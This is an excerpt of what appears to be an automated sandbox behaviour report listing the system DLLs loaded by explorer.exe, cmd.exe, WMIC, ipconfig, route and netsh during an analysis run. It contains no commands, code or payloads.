Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
